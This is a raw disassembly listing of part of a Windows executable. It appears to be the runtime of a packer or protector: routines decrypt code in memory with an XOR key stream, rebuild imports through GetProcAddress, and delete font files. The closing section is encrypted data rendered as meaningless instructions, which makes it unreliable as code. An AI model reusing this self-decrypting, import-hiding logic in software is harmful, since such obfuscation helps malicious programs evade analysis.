var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00418295 SIZE 00000011 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_421428
push offset sub_4104E0
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFB8h
push ebx
push esi
push edi
mov [ebp+var_1C], 0
mov [ebp+var_4], 0
mov eax, ds:dword_424888
mov dword ptr [eax+0Ch], 0
mov ecx, ds:dword_424888
mov edx, [ecx+4]
shl edx, 4
push edx
call sub_41BA4A
add esp, 4
mov [ebp+var_40], eax
mov eax, [ebp+var_40]
mov [ebp+var_1C], eax
loc_4180CB: ; CODE XREF: sub_418070+1E7�j
mov [ebp+var_34], 0
mov [ebp+var_28], 0
mov [ebp+var_30], 0
mov ecx, ds:dword_424888
mov edx, [ecx]
mov [ebp+var_20], edx
jmp short loc_4180F6
; ---------------------------------------------------------------------------
loc_4180ED: ; CODE XREF: sub_418070+9E�j
; sub_418070+132�j ...
mov eax, [ebp+var_20]
mov ecx, [eax+10h]
mov [ebp+var_20], ecx
loc_4180F6: ; CODE XREF: sub_418070+7B�j
cmp [ebp+var_20], 0
jz loc_4181D9
mov edx, [ebp+var_20]
mov eax, [ebp+var_20]
mov ecx, [edx+14h]
cmp ecx, [eax+18h]
jnz short loc_418110
jmp short loc_4180ED
; ---------------------------------------------------------------------------
loc_418110: ; CODE XREF: sub_418070+9C�j
cmp [ebp+var_30], 0
jz loc_4181B2
mov edx, [ebp+var_20]
mov eax, [edx+14h]
shl eax, 4
mov ecx, [ebp+var_20]
mov edx, [ecx+4]
add edx, eax
mov [ebp+var_38], edx
mov eax, [ebp+var_30]
mov [ebp+var_48], eax
mov ecx, [ebp+var_38]
mov edx, [ecx]
mov [ebp+var_4C], edx
loc_41813C: ; CODE XREF: sub_418070+FE�j
mov eax, [ebp+var_4C]
mov cl, [eax]
mov [ebp+var_4D], cl
mov edx, [ebp+var_48]
cmp cl, [edx]
jnz short loc_418179
cmp [ebp+var_4D], 0
jz short loc_418170
mov eax, [ebp+var_4C]
mov cl, [eax+1]
mov [ebp+var_4E], cl
mov edx, [ebp+var_48]
cmp cl, [edx+1]
jnz short loc_418179
add [ebp+var_4C], 2
add [ebp+var_48], 2
cmp [ebp+var_4E], 0
jnz short loc_41813C
loc_418170: ; CODE XREF: sub_418070+DF�j
mov [ebp+var_54], 0
jmp short loc_418181
; ---------------------------------------------------------------------------
loc_418179: ; CODE XREF: sub_418070+D9�j
; sub_418070+F0�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
mov [ebp+var_54], eax
loc_418181: ; CODE XREF: sub_418070+107�j
mov ecx, [ebp+var_54]
mov [ebp+var_58], ecx
mov edx, [ebp+var_58]
mov [ebp+var_3C], edx
cmp [ebp+var_3C], 0
jnz short loc_4181A7
mov eax, [ebp+var_20]
mov ecx, [eax+14h]
add ecx, 1
mov edx, [ebp+var_20]
mov [edx+14h], ecx
jmp loc_4180ED
; ---------------------------------------------------------------------------
loc_4181A7: ; CODE XREF: sub_418070+121�j
cmp [ebp+var_3C], 0
jle short loc_4181B2
jmp loc_4180ED
; ---------------------------------------------------------------------------
loc_4181B2: ; CODE XREF: sub_418070+A4�j
; sub_418070+13B�j
mov eax, [ebp+var_20]
mov [ebp+var_28], eax
mov ecx, [ebp+var_28]
mov edx, [ecx+14h]
shl edx, 4
mov eax, [ebp+var_28]
mov ecx, [eax+4]
add ecx, edx
mov [ebp+var_34], ecx
mov edx, [ebp+var_34]
mov eax, [edx]
mov [ebp+var_30], eax
jmp loc_4180ED
; ---------------------------------------------------------------------------
loc_4181D9: ; CODE XREF: sub_418070+8A�j
cmp [ebp+var_30], 0
jnz short loc_4181E1
jmp short loc_41825C
; ---------------------------------------------------------------------------
loc_4181E1: ; CODE XREF: sub_418070+16D�j
mov ecx, ds:dword_424888
mov edx, [ecx+0Ch]
shl edx, 4
mov eax, [ebp+var_1C]
add eax, edx
mov [ebp+var_24], eax
mov ecx, [ebp+var_24]
mov edx, [ebp+var_34]
mov [ecx], edx
mov eax, [ebp+var_24]
mov ecx, [ebp+var_28]
mov [eax+0Ch], ecx
mov edx, [ebp+var_24]
mov dword ptr [edx+8], 0
mov eax, [ebp+var_28]
mov ecx, [ebp+var_34]
sub ecx, [eax+4]
sar ecx, 4
mov edx, [ebp+var_28]
mov eax, [edx+8]
mov edx, [ebp+var_24]
mov eax, [eax+ecx*4]
mov [edx+4], eax
mov ecx, [ebp+var_24]
mov edx, [ecx+4]
mov [ebp+var_2C], edx
mov eax, ds:dword_424888
mov ecx, [eax+0Ch]
add ecx, 1
mov edx, ds:dword_424888
mov [edx+0Ch], ecx
mov eax, [ebp+var_28]
mov ecx, [eax+14h]
add ecx, 1
mov edx, [ebp+var_28]
mov [edx+14h], ecx
jmp loc_4180CB
; ---------------------------------------------------------------------------
loc_41825C: ; CODE XREF: sub_418070+16F�j
mov eax, ds:dword_424888
mov ecx, [ebp+var_1C]
mov [eax+8], ecx
mov [ebp+var_1C], 0
mov [ebp+var_4], 0FFFFFFFFh
call sub_41827C
jmp short loc_418295
sub_418070 endp
; =============== S U B R O U T I N E =======================================
sub_41827C proc near ; CODE XREF: sub_418070+205�p
; DATA XREF: _4:00421430�o
cmp dword ptr [ebp-1Ch], 0
jz short locret_418294
mov edx, [ebp-1Ch]
mov [ebp-44h], edx
mov eax, [ebp-44h]
push eax
call sub_41BACD
add esp, 4
locret_418294: ; CODE XREF: sub_41827C+4�j
retn
sub_41827C endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_418070
loc_418295: ; CODE XREF: sub_418070+20A�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_418070
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4182B0 proc near ; CODE XREF: sub_41D6FE+77�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0041838E SIZE 00000011 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_421438
push offset sub_4104E0
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFE4h
push ebx
push esi
push edi
mov eax, ds:dword_424868
mov [ebp+var_24], eax
cmp [ebp+var_24], 0
jz short loc_4182F4
mov ecx, [ebp+var_24]
add ecx, 10h
push ecx
call ds:dword_42101C ; RtlEnterCriticalSection
mov byte ptr [ebp+var_28], 1
jmp short loc_4182F8
; ---------------------------------------------------------------------------
loc_4182F4: ; CODE XREF: sub_4182B0+2F�j
mov byte ptr [ebp+var_28], 0
loc_4182F8: ; CODE XREF: sub_4182B0+42�j
mov edx, [ebp+var_28]
and edx, 0FFh
test edx, edx
jz loc_41838E
mov [ebp+var_4], 0
cmp ds:dword_424868, 0
jz short loc_418363
mov ecx, ds:dword_424868
call sub_41ED42
loc_418324: ; CODE XREF: sub_4182B0:loc_418361�j
lea eax, [ebp+var_1C]
push eax
lea ecx, [ebp+var_20]
push ecx
mov ecx, ds:dword_424868
call sub_41ED59
and eax, 0FFh
test eax, eax
jz short loc_418363
mov edx, [ebp+var_1C]
cmp dword ptr [edx], 0
jnz short loc_418361
mov eax, [ebp+var_20]
mov ecx, [eax]
push ecx
call ds:dword_42476C ; RemoveFontResourceA
mov edx, [ebp+var_1C]
mov eax, [edx+4]
push eax
call ds:dword_424640 ; DeleteFileA
loc_418361: ; CODE XREF: sub_4182B0+96�j
jmp short loc_418324
; ---------------------------------------------------------------------------
loc_418363: ; CODE XREF: sub_4182B0+67�j
; sub_4182B0+8E�j
mov [ebp+var_4], 0FFFFFFFFh
call sub_418371
jmp short loc_41838E
sub_4182B0 endp
; =============== S U B R O U T I N E =======================================
sub_418371 proc near ; CODE XREF: sub_4182B0+BA�p
; DATA XREF: _4:00421440�o
mov ecx, ds:dword_424868
mov [ebp-2Ch], ecx
cmp dword ptr [ebp-2Ch], 0
jz short locret_41838D
mov edx, [ebp-2Ch]
add edx, 10h
push edx
call ds:dword_421018 ; RtlLeaveCriticalSection
locret_41838D: ; CODE XREF: sub_418371+D�j
retn
sub_418371 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4182B0
loc_41838E: ; CODE XREF: sub_4182B0+53�j
; sub_4182B0+BF�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_4182B0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41839F proc near ; CODE XREF: sub_41847D+C�p
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0041846E SIZE 0000000F BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_421448
push offset sub_4104E0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_34], edx
mov [ebp+var_30], ecx
mov eax, offset dword_411740
push dword ptr [eax+4]
call ds:dword_424644 ; RtlEnterCriticalSection
and [ebp+var_4], 0
mov eax, [ebp+var_30]
mov eax, [eax]
mov [ebp+var_24], eax
mov eax, [ebp+var_30]
mov eax, [eax-4]
mov [ebp+var_2C], eax
mov eax, [ebp+var_24]
and eax, 0FFFFh
mov ecx, [ebp+var_2C]
sub ecx, eax
mov [ebp+var_1C], ecx
mov eax, [ebp+var_24]
shr eax, 10h
mov ecx, [ebp+var_2C]
add ecx, eax
mov [ebp+var_28], ecx
mov eax, [ebp+var_1C]
mov [ebp+var_20], eax
jmp short loc_41841A
; ---------------------------------------------------------------------------
loc_418413: ; CODE XREF: sub_41839F+9D�j
mov eax, [ebp+var_1C]
inc eax
mov [ebp+var_1C], eax
loc_41841A: ; CODE XREF: sub_41839F+72�j
mov eax, [ebp+var_1C]
cmp eax, [ebp+var_28]
jz short loc_41843E
mov eax, [ebp+var_1C]
imul eax, 19660Dh
add eax, 3C6EF35Fh
mov ecx, [ebp+var_1C]
mov cl, [ecx]
xor cl, al
mov eax, [ebp+var_1C]
mov [eax], cl
jmp short loc_418413
; ---------------------------------------------------------------------------
loc_41843E: ; CODE XREF: sub_41839F+81�j
mov eax, [ebp+var_28]
sub eax, [ebp+var_20]
push eax
push [ebp+var_20]
push ds:dword_42460C
call ds:dword_4245F0 ; FlushInstructionCache
or [ebp+var_4], 0FFFFFFFFh
call sub_41845F
jmp short loc_41846E
sub_41839F endp
; =============== S U B R O U T I N E =======================================
sub_41845F proc near ; CODE XREF: sub_41839F+B9�p
; DATA XREF: _4:00421450�o
mov eax, offset dword_411740
push dword ptr [eax+4]
call ds:dword_4246D4 ; RtlLeaveCriticalSection
retn
sub_41845F endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41839F
loc_41846E: ; CODE XREF: sub_41839F+BE�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; END OF FUNCTION CHUNK FOR sub_41839F
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41847D proc near ; CODE XREF: sub_411B9E�j
arg_0 = byte ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
pusha
xor edx, edx
lea ecx, [ebp+arg_0]
call sub_41839F
popa
pop edi
pop esi
pop ebx
pop ebp
retn 4
sub_41847D endp
; ---------------------------------------------------------------------------
loc_418496: ; CODE XREF: _3:00411BA3�j _3:00411BA8�j
mov ecx, 0EF000008h
call sub_41BA32
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4184A0 proc near ; CODE XREF: sub_418730+25�p
; sub_418780+144�p
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3A = byte ptr -3Ah
var_39 = byte ptr -39h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 48h
mov [ebp+var_4], 1
mov [ebp+var_8], 0
jmp short loc_4184BC
; ---------------------------------------------------------------------------
loc_4184B3: ; CODE XREF: sub_4184A0+E0�j
; sub_4184A0+276�j
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_8], eax
loc_4184BC: ; CODE XREF: sub_4184A0+11�j
mov ecx, [ebp+var_8]
imul ecx, 14h
mov edx, [ebp+arg_0]
cmp dword ptr [edx+ecx+0Ch], 0
jnz short loc_4184D1
jmp loc_41871B
; ---------------------------------------------------------------------------
loc_4184D1: ; CODE XREF: sub_4184A0+2A�j
mov eax, [ebp+var_8]
imul eax, 14h
mov ecx, [ebp+arg_0]
mov edx, [ebp+arg_4]
add edx, [ecx+eax]
mov [ebp+var_C], edx
mov eax, [ebp+var_8]
imul eax, 14h
mov ecx, [ebp+arg_0]
mov edx, [ebp+arg_4]
add edx, [ecx+eax+10h]
mov [ebp+var_20], edx
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_C]
cmp ecx, [eax+34h]
jnz short loc_418509
mov edx, [ebp+var_20]
mov [ebp+var_C], edx
jmp short loc_418517
; ---------------------------------------------------------------------------
loc_418509: ; CODE XREF: sub_4184A0+5F�j
mov eax, [ebp+var_C]
cmp eax, [ebp+arg_4]
jnz short loc_418517
mov ecx, [ebp+var_20]
mov [ebp+var_C], ecx
loc_418517: ; CODE XREF: sub_4184A0+67�j
; sub_4184A0+6F�j
mov edx, [ebp+var_8]
imul edx, 14h
mov eax, [ebp+arg_0]
mov ecx, [ebp+arg_4]
add ecx, [eax+edx+0Ch]
mov [ebp+var_24], ecx
mov edx, [ebp+var_8]
imul edx, 14h
mov eax, [ebp+arg_0]
xor ecx, ecx
cmp dword ptr [eax+edx+4], 0FFFFFFFEh
setnz cl
mov byte ptr [ebp+var_1C], cl
mov edx, [ebp+var_8]
imul edx, 14h
mov eax, [ebp+arg_0]
cmp dword ptr [eax+edx+4], 0
jnz short loc_41855D
mov ecx, [ebp+var_1C]
and ecx, 0FFh
test ecx, ecx
jz short loc_4185A7
loc_41855D: ; CODE XREF: sub_4184A0+AE�j
mov edx, [ebp+arg_10]
and edx, 0FFh
test edx, edx
jz short loc_418587
mov eax, [ebp+var_24]
push eax
call sub_41E254
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_418585
mov [ebp+var_4], 0
jmp loc_4184B3
; ---------------------------------------------------------------------------
loc_418585: ; CODE XREF: sub_4184A0+DA�j
jmp short loc_4185A7
; ---------------------------------------------------------------------------
loc_418587: ; CODE XREF: sub_4184A0+C8�j
mov ecx, [ebp+var_24]
push ecx
call sub_41E15D
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_4185A7
mov edx, [ebp+var_24]
push edx
push offset aTheDynamicLink ; "The dynamic link library '%s' could not"...
call sub_41BBE7
loc_4185A7: ; CODE XREF: sub_4184A0+BB�j
; sub_4184A0:loc_418585�j ...
mov eax, ds:dword_423BC0
mov [ebp+var_18], eax
mov ecx, [ebp+arg_C]
mov ds:dword_423BC0, ecx
push 0
call ds:dword_424698 ; GetModuleHandleA
cmp eax, [ebp+arg_4]
jnz short loc_41862C
mov [ebp+var_34], offset aExecutable ; "EXECUTABLE"
mov edx, [ebp+arg_C]
mov [ebp+var_38], edx
loc_4185D2: ; CODE XREF: sub_4184A0+164�j
mov eax, [ebp+var_38]
mov cl, [eax]
mov [ebp+var_39], cl
mov edx, [ebp+var_34]
cmp cl, [edx]
jnz short loc_41860F
cmp [ebp+var_39], 0
jz short loc_418606
mov eax, [ebp+var_38]
mov cl, [eax+1]
mov [ebp+var_3A], cl
mov edx, [ebp+var_34]
cmp cl, [edx+1]
jnz short loc_41860F
add [ebp+var_38], 2
add [ebp+var_34], 2
cmp [ebp+var_3A], 0
jnz short loc_4185D2
loc_418606: ; CODE XREF: sub_4184A0+145�j
mov [ebp+var_40], 0
jmp short loc_418617
; ---------------------------------------------------------------------------
loc_41860F: ; CODE XREF: sub_4184A0+13F�j
; sub_4184A0+156�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
mov [ebp+var_40], eax
loc_418617: ; CODE XREF: sub_4184A0+16D�j
mov ecx, [ebp+var_40]
mov [ebp+var_44], ecx
cmp [ebp+var_44], 0
jz short loc_41862C
mov [ebp+var_48], 0
jmp short loc_418633
; ---------------------------------------------------------------------------
loc_41862C: ; CODE XREF: sub_4184A0+123�j
; sub_4184A0+181�j
mov [ebp+var_48], 1
loc_418633: ; CODE XREF: sub_4184A0+18A�j
mov dl, byte ptr [ebp+var_48]
mov byte ptr [ebp+var_10], dl
jmp short loc_41864D
; ---------------------------------------------------------------------------
loc_41863B: ; CODE XREF: sub_4184A0:loc_4186F8�j
mov eax, [ebp+var_20]
add eax, 4
mov [ebp+var_20], eax
mov ecx, [ebp+var_C]
add ecx, 4
mov [ebp+var_C], ecx
loc_41864D: ; CODE XREF: sub_4184A0+199�j
mov edx, [ebp+var_20]
cmp dword ptr [edx], 0
jz loc_4186FD
mov eax, [ebp+var_8]
imul eax, 14h
mov ecx, [ebp+arg_0]
cmp dword ptr [ecx+eax+4], 0
jnz short loc_418676
mov edx, [ebp+var_1C]
and edx, 0FFh
test edx, edx
jz short loc_4186D4
loc_418676: ; CODE XREF: sub_4184A0+1C7�j
mov eax, [ebp+var_C]
mov ecx, [eax]
and ecx, 80000000h
test ecx, ecx
jnz short loc_4186A8
mov edx, [ebp+var_C]
mov eax, [ebp+arg_4]
add eax, [edx]
mov [ebp+var_28], eax
mov ecx, [ebp+var_28]
add ecx, 2
push ecx
mov edx, [ebp+var_14]
push edx
call ds:dword_4246A8 ; GetProcAddress
mov ecx, [ebp+var_20]
mov [ecx], eax
jmp short loc_4186D4
; ---------------------------------------------------------------------------
loc_4186A8: ; CODE XREF: sub_4184A0+1E3�j
mov edx, [ebp+var_C]
mov eax, [edx]
and eax, 0FFFFh
mov [ebp+var_30], eax
mov ecx, [ebp+var_30]
push ecx
mov edx, [ebp+var_14]
push edx
call ds:dword_4246A8 ; GetProcAddress
mov [ebp+var_2C], eax
cmp [ebp+var_2C], 0
jz short loc_4186D4
mov eax, [ebp+var_20]
mov ecx, [ebp+var_2C]
mov [eax], ecx
loc_4186D4: ; CODE XREF: sub_4184A0+1D4�j
; sub_4184A0+206�j ...
mov edx, [ebp+var_10]
and edx, 0FFh
test edx, edx
jz short loc_4186F8
mov eax, [ebp+var_24]
push eax
mov ecx, ds:dword_423BC0
push ecx
mov edx, [ebp+var_20]
push edx
call sub_418E90
add esp, 0Ch
loc_4186F8: ; CODE XREF: sub_4184A0+23F�j
jmp loc_41863B
; ---------------------------------------------------------------------------
loc_4186FD: ; CODE XREF: sub_4184A0+1B3�j
mov eax, [ebp+var_18]
mov ds:dword_423BC0, eax
mov ecx, [ebp+var_8]
imul ecx, 14h
mov edx, [ebp+arg_0]
mov dword ptr [edx+ecx+4], 0FFFFFFFEh
jmp loc_4184B3
; ---------------------------------------------------------------------------
loc_41871B: ; CODE XREF: sub_4184A0+2C�j
mov al, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_4184A0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418730 proc near ; CODE XREF: sub_419529+196�p
; sub_419903+43�p
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
push ebp
mov ebp, esp
push ecx
mov eax, ds:dword_424894
add eax, 1
mov ds:dword_424894, eax
mov cl, [ebp+arg_10]
push ecx
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_4184A0
add esp, 14h
mov [ebp+var_4], al
mov eax, ds:dword_424894
sub eax, 1
mov ds:dword_424894, eax
mov al, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_418730 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418780 proc near ; CODE XREF: _3:004122C6�p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 2Ch
mov [ebp+var_14], 0
call sub_416C60
call sub_41D40A
call sub_410386
mov eax, ds:dword_424604
mov ecx, [eax+4]
mov [ebp+var_14], ecx
mov edx, [ebp+var_14]
mov eax, [ebp+var_14]
add eax, [edx+3Ch]
mov ds:dword_424890, eax
mov ecx, ds:dword_424890
cmp dword ptr [ecx], 4550h
jz short loc_4187CD
mov ecx, 0EF000002h
call sub_41BA32
loc_4187CD: ; CODE XREF: sub_418780+41�j
mov edx, ds:dword_424618
sub edx, 3
mov [ebp+var_4], edx
mov [ebp+var_10], 0
jmp short loc_4187EB
; ---------------------------------------------------------------------------
loc_4187E2: ; CODE XREF: sub_418780+90�j
; sub_418780+110�j
mov eax, [ebp+var_10]
add eax, 1
mov [ebp+var_10], eax
loc_4187EB: ; CODE XREF: sub_418780+60�j
mov ecx, [ebp+var_10]
cmp ecx, [ebp+var_4]
jnb loc_418895
mov edx, [ebp+var_10]
imul edx, 28h
mov eax, ds:off_42461C
add eax, edx
mov [ebp+var_1C], eax
mov ecx, [ebp+var_1C]
cmp dword ptr [ecx+0Ch], 0
jnz short loc_418812
jmp short loc_4187E2
; ---------------------------------------------------------------------------
loc_418812: ; CODE XREF: sub_418780+8E�j
cmp [ebp+var_10], 20h
jnb short loc_418839
mov edx, 1
mov ecx, [ebp+var_10]
shl edx, cl
mov eax, ds:dword_424604
mov ecx, [eax+10h]
and ecx, edx
test ecx, ecx
jz short loc_418839
mov [ebp+var_28], 1
jmp short loc_418840
; ---------------------------------------------------------------------------
loc_418839: ; CODE XREF: sub_418780+96�j
; sub_418780+AE�j
mov [ebp+var_28], 0
loc_418840: ; CODE XREF: sub_418780+B7�j
mov edx, [ebp+var_28]
mov [ebp+var_20], edx
cmp [ebp+var_10], 20h
jnb short loc_41886E
mov eax, 1
mov ecx, [ebp+var_10]
shl eax, cl
mov ecx, ds:dword_424604
mov edx, [ecx+14h]
and edx, eax
test edx, edx
jz short loc_41886E
mov [ebp+var_2C], 1
jmp short loc_418875
; ---------------------------------------------------------------------------
loc_41886E: ; CODE XREF: sub_418780+CA�j
; sub_418780+E3�j
mov [ebp+var_2C], 0
loc_418875: ; CODE XREF: sub_418780+EC�j
mov eax, [ebp+var_2C]
mov [ebp+var_24], eax
mov ecx, [ebp+var_14]
push ecx
mov edx, [ebp+var_1C]
push edx
mov eax, [ebp+var_24]
push eax
mov ecx, [ebp+var_20]
push ecx
call loc_418940
jmp loc_4187E2
; ---------------------------------------------------------------------------
loc_418895: ; CODE XREF: sub_418780+71�j
mov edx, ds:dword_424604
mov eax, [ebp+var_14]
add eax, [edx+8]
mov [ebp+var_8], eax
mov ds:dword_424894, 0
push 0
push offset aExecutable ; "EXECUTABLE"
mov ecx, ds:dword_424890
push ecx
mov edx, [ebp+var_14]
push edx
mov eax, [ebp+var_8]
push eax
call sub_4184A0
add esp, 14h
call sub_4198F2
and eax, 0FFh
test eax, eax
jz short loc_4188EF
loc_4188DA: ; CODE XREF: sub_418780+168�j
call sub_419903
and eax, 0FFh
test eax, eax
jz short loc_4188EA
jmp short loc_4188DA
; ---------------------------------------------------------------------------
loc_4188EA: ; CODE XREF: sub_418780+166�j
call sub_4198F2
loc_4188EF: ; CODE XREF: sub_418780+158�j
push offset aImm32_dll ; "imm32.dll"
call ds:dword_424698 ; GetModuleHandleA
mov [ebp+var_18], eax
cmp [ebp+var_18], 0
jz short loc_418911
push offset aImm32_dll ; "imm32.dll"
mov ecx, [ebp+var_18]
push ecx
call sub_418B30
loc_418911: ; CODE XREF: sub_418780+181�j
push offset aOleoaut32_dll ; "oleoaut32.dll"
call ds:dword_424698 ; GetModuleHandleA
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_418933
push offset aOleaout32_dll ; "oleaout32.dll"
mov edx, [ebp+var_C]
push edx
call sub_418B30
loc_418933: ; CODE XREF: sub_418780+1A3�j
mov esp, ebp
pop ebp
retn
sub_418780 endp
; ---------------------------------------------------------------------------
align 10h
loc_418940: ; CODE XREF: sub_418780+10B�p
push ebp
mov ebp, esp
sub esp, 0F8h
push ebx
push esi
push edi
cmp dword ptr [ebp+0Ch], 0
jz loc_418A0A
push 300000h
call sub_411B9E
scasd
fsubr qword ptr [edx-5Ah]
test byte ptr [eax-8], 74h
sub al, 0F9h
rol dword ptr [ebp-72h], 1
cld
not byte ptr [ebx+3]
xchg eax, ebp
mov esp, 0A2AFBC1Ah
loc_418977: ; CODE XREF: _3:004189C1�j
loope loc_4189AB
xchg eax, esp
sbb dl, dh
mov ebx, 56D12C79h
popa
; ---------------------------------------------------------------------------
dw 0F9DDh
dd 0A45DFECh, 86617447h, 5D6A1A75h, 4FA2C3Fh, 0E4882266h
dd 7C7720B6h, 5E2DD34Bh, 59B101F6h
db 4Ch
; ---------------------------------------------------------------------------
loc_4189A5: ; CODE XREF: _3:004189D2�j
aas
movsd
cli
out 0D3h, eax
; ---------------------------------------------------------------------------
db 1
; ---------------------------------------------------------------------------
loc_4189AB: ; CODE XREF: _3:loc_418977�j
out 0F5h, al
mov ecx, 0CCDFBDCAh
pop edx
movsb
push es
inc edx
call near ptr 0F982C5FFh
and [edi+eax], edx
xchg dl, dl
aas
jl short loc_418977
retf
; ---------------------------------------------------------------------------
dd 85929F63h
db 6Fh, 4, 77h
; ---------------------------------------------------------------------------
loc_4189CB: ; CODE XREF: _3:00418A47�j
push ecx
inc esp
; ---------------------------------------------------------------------------
db 0A0h, 0F2h, 0E2h
db 0C4h
; ---------------------------------------------------------------------------
loc_4189D1: ; CODE XREF: _3:00418A3B�j
cld
loope loc_4189A5
mov dl, 0CFh
retn 0C7DAh
; ---------------------------------------------------------------------------
db 57h, 0B8h, 0FBh
dd 394BED42h, 1926E82Ah, 9F86520Ch, 0B1BECB0Bh
; ---------------------------------------------------------------------------
or esp, ebp
clc
loc_4189EF: ; CODE XREF: _3:00418A2D�j
mov dl, 70h
arpl [esi+5Eh], dx
pop esp
xor [edx], esp
adc eax, 1E112F9Fh ; CODE XREF: _3:00418A08�j
sub edx, eax
fld st(3)
mov al, ds:33909093h
leave
test ecx, ecx
jnz short near ptr loc_4189F7+1
loc_418A0A: ; CODE XREF: _3:00418950�j
cmp dword ptr [ebp+8], 0
jz loc_418B1D
mov dword ptr [ebp-0E4h], 0
push 5F0000h
call sub_411B9E
mul esp
mov dl, 5Ch
push ds
jp short loc_4189EF
sub al, 44h
cdq
stc
jge short loc_418A83
add al, 1Eh
bound edi, [ebx]
int 0DCh ; used by BASIC while in interpreter
jle short loc_4189D1
xchg edi, [edx+19h]
or cl, [esi+eax*2-1094D3C7h]
jnb short loc_4189CB
or al, 0DEh
rol esp, 1
retn
; ---------------------------------------------------------------------------
fadd dword ptr [edx-70h]
xor dword ptr [esi+1Dh], 0FFFFFFF2h
mov ah, 34h
pop edi
retn
; ---------------------------------------------------------------------------
db 1Bh, 0Eh, 1
dd 0CD319D80h, 8E09B3C0h, 9A8DAF91h, 47C57024h, 0FD0AE45Eh
dd 3AA497F0h, 0E3A2AFBCh, 616E98FAh, 0D29AD054h
db 0ACh, 0ECh, 11h
; ---------------------------------------------------------------------------
loc_418A83: ; CODE XREF: _3:00418A33�j
adc [edx-28552D21h], eax
db 67h
mov bl, 0EBh
test eax, 22297BFDh
test al, 36h
sub [ebx+edi*2], ebx
dec eax
sub ch, al
fcmovne st, st(6)
mov ebp, 0CFEE508Dh
arpl [ebx+66h], si
pop ecx
cmp [ecx], al
or al, 33h
in eax, 7 ; DMA controller, 8237A-5.
; channel 3 current word count
movsb
test edx, ebx
stosd
aam 41h
mov esp, 9BFBE2F8h
outsd
bound edx, [ebp+3Eh]
dec ecx
shl dword ptr [ecx], 14h
pop es
mov es, word ptr [edi-46392CF5h]
add ebx, ebp
call near ptr 5EAD0331h
; ---------------------------------------------------------------------------
db 0FEh
; ---------------------------------------------------------------------------
db 36h
inc ebp
lds ebx, ds:9D580310h
mov dh, 10h
retn 0A8B5h
; ---------------------------------------------------------------------------
db 36h, 99h, 91h
dd 31A5980Ah, 265CDC7Bh, 2A650A87h, 0A641761Bh, 827558ACh
dd 0B6A9EFE7h, 7A7938C3h, 9090FB08h, 0C085C033h, 8D8BEE75h
